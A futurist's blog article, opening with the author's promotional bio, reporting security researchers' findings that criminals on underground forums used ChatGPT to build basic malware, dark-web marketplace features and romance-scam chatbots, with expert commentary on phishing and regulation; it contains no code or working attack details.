Matthew Griffin, described as “The Adviser behind the Advisers” and a “Young Kurzweil,” is the founder and CEO of the World Futures Forum and the 311 Institute, a global Futures and Deep Futures consultancy working between the dates of 2020 to 2070, and is an award winning futurist, and author of “Codex of the Future” series. Regularly featured in the global media, including AP, BBC, Bloomberg, CNBC, Discovery, RT, Viacom, and WIRED, Matthew’s ability to identify, track, and explain the impacts of hundreds of revolutionary emerging technologies on global culture, industry and society, is unparalleled. Recognised for the past six years as one of the world’s foremost futurists, innovation and strategy experts Matthew is an international speaker who helps governments, investors, multi-nationals and regulators around the world envision, build and lead an inclusive, sustainable future. A rare talent Matthew’s recent work includes mentoring Lunar XPrize teams, re-envisioning global education and training with the G20, and helping the world’s largest organisations envision and ideate the future of their products and services, industries, and countries. Matthew's clients include three Prime Ministers and several governments, including the G7, Accenture, Aon, Bain & Co, BCG, Credit Suisse, Dell EMC, Dentons, Deloitte, E&Y, GEMS, Huawei, JPMorgan Chase, KPMG, Lego, McKinsey, PWC, Qualcomm, SAP, Samsung, Sopra Steria, T-Mobile, and many more.
WHY THIS MATTERS IN BRIEF
ChatGPT automates, and therefore makes it easier, to create sophisticated scam bots and new kinds of malware, and this problem’s just getting started.
Love the Exponential Future? Join our XPotential Community, future proof yourself with courses from XPotential University, read about exponential tech and trends, connect, watch a keynote, or browse my blog.
ChatGPT has taken the world by storm, and my son even used to to write and illustrate a new book, which isn’t bad for a ten year old … But now cybercriminals have started using OpenAI’s artificially intelligent chatbot ChatGPT to quickly build new hacking tools, cybersecurity researchers warned on Friday. Scammers are also testing ChatGPT’s ability to build other chatbots designed to impersonate young females to ensnare targets, one expert monitoring criminal forums told investigators.
Many early ChatGPT users had raised the alarm that the app, which went viral in the days after its launch in December, could code malicious software capable of spying on users’ keyboard strokes or create ransomware.
And now underground criminal forums have finally caught on, according to a report from Israeli security company Check Point. In one forum post reviewed by Check Point, a hacker who’d previously shared Android malware showcased code written by ChatGPT that stole files of interest, compressed them and sent them across the web. They showed off another tool that installed a backdoor on a computer and could upload further malware to an infected PC.
The Future of Cyber Crime, by keynote Matthew Griffin
In the same forum, another user shared Python code that could encrypt files, saying OpenAI’s app helped them build it. They claimed it was the first script they’d ever developed – something which also pushes me to highlight the fact that now to create decent enough code you don’t actually need to know anything about coding, just use ChatGPT as a Robo-Programmer.
As Check Point noted in its report, such code can be used for entirely benign purposes, but it could also “easily be modified to encrypt someone’s machine completely without any user interaction,” similar to the way in which ransomware works. The same forum user had previously sold access to hacked company servers and stolen data, Check Point noted.
One user also discussed “abusing” ChatGPT by having it help code up features of a dark web marketplace, akin to drug bazaars like Silk Road or Alphabay. As an example, the user showed how the chat bot could quickly build an app that monitored cryptocurrency prices for a theoretical payment system.
Alex Holden, founder of cyber intelligence company Hold Security, said he’d seen dating scammers start using ChatGPT too, as they try to create convincing personas.
“They are planning to create chatbots to impersonate mostly girls to go further in chats with their marks,” he said. “They’re trying to automate idle chatter.”
OpenAI hadn’t responded to a request for comment at the time of publication.
While the ChatGPT-coded tools looked “pretty basic,” Check Point said it was only a matter of time until more “sophisticated” hackers found a way of turning the AI to their advantage. Rik Ferguson, vice president of security intelligence at American cybersecurity company Forescout, said it didn’t appear that ChatGPT was yet capable of coding something as complex as the major ransomware strains that have been see in significant hacking incidents in recent years, such as Conti, infamous for its use in the breach of Ireland’s national health system. OpenAI’s tool will, however, lower the barrier of entry for novices to enter that illicit market by building more basic, but similarly effective malware, Ferguson added.
He raised a further concern that rather than build code that steals victims’ data, ChatGPT could also be used to help build websites and bots that trick users into sharing their information. It could “industrialize the creation and personalisation of malicious web pages, highly-targeted phishing campaigns and social engineering reliant scams,” Ferguson added.
Sergey Shykevich, Check Point threat intelligence researcher, added ChatGPT will be a “great tool” for Russian hackers who’re not adept at English to craft legitimate-looking phishing emails.
As for protections against criminal use of ChatGPT, Shykevich said it would ultimately, and “unfortunately,” have to be enforced with regulation. OpenAI has implemented some controls, preventing obvious requests for ChatGPT to build spyware with policy violation warnings, though hackers and journalists have found ways to easily bypass those protections. Shykevich said companies like OpenAI may have to be legally compelled to train their AI to detect such abuse which, let’s face it will be pretty much impossible to enforce.